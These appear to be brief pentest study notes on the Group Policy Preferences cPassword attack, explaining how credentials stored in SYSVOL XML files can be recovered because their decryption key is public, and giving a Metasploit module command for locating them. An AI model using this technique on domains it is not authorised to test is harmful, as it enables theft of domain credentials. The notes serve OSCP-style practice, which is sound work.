cPassword / GPP Attack

PRACTICE ! PRACTICE ! PRACTICE !

The GPP or the Group Policy Preferences attack allows Admins to create policies using embedded credentials

• These credentials are encrypted and placed in an XML document known as "cPassword"

• The Decryption Key was accidentally released :)

• Patched in MS14-025, but doesn't prevent previous uses

While addressed in MS14-025, this patch only prevents new policies from being created, and any legacy GPPs containing credentials must be found and removed - One of these methods to find those credz is mining SYSVOL for credential data

SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. SYSVOL contains logon scripts, group policy data, and other domain-wide data which needs to be available anywhere there is a Domain Controller (since SYSVOL is automatically synchronized and shared among all Domain Controllers).

All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

We can use a metasploit module called smb_enum_gpp to find the group.xml file

use auxiliary/scanner/smb/smb_enum_gpp

GPP attacksInternal Pentest

Reference

Active Writeup w/o MetasploitHack The Box OSCP Preparation

HTB Active